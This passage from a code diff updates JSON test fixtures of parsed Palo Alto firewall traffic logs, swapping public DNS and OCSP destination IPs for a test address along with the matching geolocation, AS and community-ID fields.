+10434,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -10346,7 +10449,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -10368,7 +10471,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:BxuDgAhR5Rh55XOXYnYF+6GKhps=" + "community_id": "1:Bc4xJ7lD1NlCA/3AmAVsQNYES64=" } }, "sequence_number": 32091174, @@ -10388,8 +10491,8 @@ ], "network": { "community_id": [ - "1:dhAcAsMUxJrHfinQA5Q7eglS7T0=", - "1:BxuDgAhR5Rh55XOXYnYF+6GKhps=" + "1:h1oeveqcJzaFWRZabjDssyQizPo=", + "1:Bc4xJ7lD1NlCA/3AmAVsQNYES64=" ], "transport": "udp", "application": "dns", @@ -10429,14 +10532,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942009218Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031765100Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -10459,30 +10562,29 @@ "destination": { "nat": { "port": 53, - "ip": "66.28.0.45" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-MD", - "city_name": "Lanham", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Maryland", + "region_name": "Jilin", "location": { - "lon": -76.8388, - "lat": 38.9705 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 174, + "number": 4837, "organization": { - "name": "Cogent Communications" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 527, - "ip": "66.28.0.45", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -10501,7 +10603,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,66.28.0.45,192.168.1.63,66.28.0.45,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -10516,7 +10618,7 @@ "destination": { "nat": { "port": 53, - "ip": "66.28.0.45" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -10538,7 +10640,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:Yv+Yq/7HK9SajeKHOV50RYQWjRU=" + "community_id": "1:BpTv1ACuUpncoNdGoG2X6a0Xa00=" } }, "sequence_number": 32091175, @@ -10558,8 +10660,8 @@ ], "network": { "community_id": [ - "1:4i/owhGS2IpySKH+SyV4sXRj0+A=", - "1:Yv+Yq/7HK9SajeKHOV50RYQWjRU=" + "1:7scQlMKp1W6Pm/fWCG6Ym+msKzM=", + "1:BpTv1ACuUpncoNdGoG2X6a0Xa00=" ], "transport": "udp", "application": "dns", @@ -10599,14 +10701,14 @@ ], "ip": [ "192.168.15.224", - "66.28.0.45", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942012714Z", - "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,66.28.0.45,192.168.1.63,66.28.0.45,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031770500Z", + "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -10629,27 +10731,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 153, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -10668,7 +10772,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -10683,7 +10787,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -10705,7 +10809,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:MxVcaRP5Y1xyEiYiNsmO1lVcN+A=" + "community_id": "1:BOB9wtAfwP5+6JDPoEYJazGGY1w=" } }, "sequence_number": 32091176, @@ -10725,8 +10829,8 @@ ], "network": { "community_id": [ - "1:KZzZcwEN4cbaTck1z2Wa/3P3YjU=", - "1:MxVcaRP5Y1xyEiYiNsmO1lVcN+A=" + "1:n7na652DSILYNbdII1evSRQ59uI=", + "1:BOB9wtAfwP5+6JDPoEYJazGGY1w=" ], "transport": "udp", "application": "dns", @@ -10766,14 +10870,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942016234Z", - "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031775900Z", + "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -10796,27 +10900,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 169, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -10835,7 +10941,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -10850,7 +10956,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -10872,7 +10978,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:p8DU1xLXG63f/3s/r6ZKJcQo9u8=" + "community_id": "1:TgKht4IY3bXV7bhl2uE8yxyTVxc=" } }, "sequence_number": 32091177, @@ -10892,8 +10998,8 @@ ], "network": { "community_id": [ - "1:LJ6ZkdUI9SYHDvi3B2Yn/9ILMbM=", - "1:p8DU1xLXG63f/3s/r6ZKJcQo9u8=" + "1:YkPur+uarfYMTJuYRe5QYRrH/es=", + "1:TgKht4IY3bXV7bhl2uE8yxyTVxc=" ], "transport": "udp", "application": "dns", @@ -10933,14 +11039,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942019749Z", - "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031781300Z", + "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -10963,27 +11069,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 128, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -11002,7 +11110,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -11017,7 +11125,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -11039,7 +11147,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:bU3nBIz+M3cDoPKg8azcJgVx+8Q=" + "community_id": "1:4kMe7BSg1jmAu9marx8zCErWXnE=" } }, "sequence_number": 32091178, @@ -11059,8 +11167,8 @@ ], "network": { "community_id": [ - "1:8CDWB7X3kkKjoV2bprSLSQY1py4=", - "1:bU3nBIz+M3cDoPKg8azcJgVx+8Q=" + "1:IG1vmXIXr9XMoOn0ZR3Jpjzb/GQ=", + "1:4kMe7BSg1jmAu9marx8zCErWXnE=" ], "transport": "udp", "application": "dns", @@ -11100,14 +11208,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942023198Z", - "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031786700Z", + "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -11130,27 +11238,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 181, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -11169,7 +11279,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -11184,7 +11294,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -11206,7 +11316,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:vnb4ttnFy2i39tg89p3jkGs6eDg=" + "community_id": "1:NpUjkT7dIbMpW4JcNZFZad7+YTk=" } }, "sequence_number": 32091179, @@ -11226,8 +11336,8 @@ ], "network": { "community_id": [ - "1:ScmRIn+bxqoJafQfJfEaH/CdCjE=", - "1:vnb4ttnFy2i39tg89p3jkGs6eDg=" + "1:g2w1ngDHewEU39cV0kn/LLmYUbE=", + "1:NpUjkT7dIbMpW4JcNZFZad7+YTk=" ], "transport": "udp", "application": "dns", @@ -11267,14 +11377,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942026632Z", - "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031792200Z", + "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -11297,27 +11407,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 121, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -11336,7 +11448,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -11351,7 +11463,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -11373,7 +11485,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:71/qcXOmOV3sXCqZ1T6JVPlE9y8=" + "community_id": "1:qSvFitPk6ZvC6N3gLeZpuL1qqCE=" } }, "sequence_number": 32091180, @@ -11393,8 +11505,8 @@ ], "network": { "community_id": [ - "1:eupsSNkv67+oInX/FQ2hHpUMyR8=", - "1:71/qcXOmOV3sXCqZ1T6JVPlE9y8=" + "1:yzXWvS3fpaPzwrvGsYmztnc8QW0=", + "1:qSvFitPk6ZvC6N3gLeZpuL1qqCE=" ], "transport": "udp", "application": "dns", @@ -11434,14 +11546,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942030233Z", - "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031797700Z", + "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -11464,30 +11576,29 @@ "destination": { "nat": { "port": 80, - "ip": "23.52.174.25" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-TX", - "city_name": "San Antonio", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Texas", + "region_name": "Jilin", "location": { - "lon": -98.6498, - "lat": 29.4551 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 20940, + "number": 4837, "organization": { - "name": "Akamai International B.V." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 1246, - "ip": "23.52.174.25", + "ip": "175.16.199.1", "packets": 5 }, "rule": { @@ -11506,7 +11617,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.52.174.25,192.168.1.63,23.52.174.25,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -11521,7 +11632,7 @@ "destination": { "nat": { "port": 80, - "ip": "23.52.174.25" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -11543,7 +11654,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:5ECmBtgiSUvWFJAA318pVeeu5Pw=" + "community_id": "1:/8tg/qp7ijclMeA6CKtchq/HXx8=" } }, "sequence_number": 32091181, @@ -11563,8 +11674,8 @@ ], "network": { "community_id": [ - "1://eZmJioBenLsE0zEL0rhbQ7JT8=", - 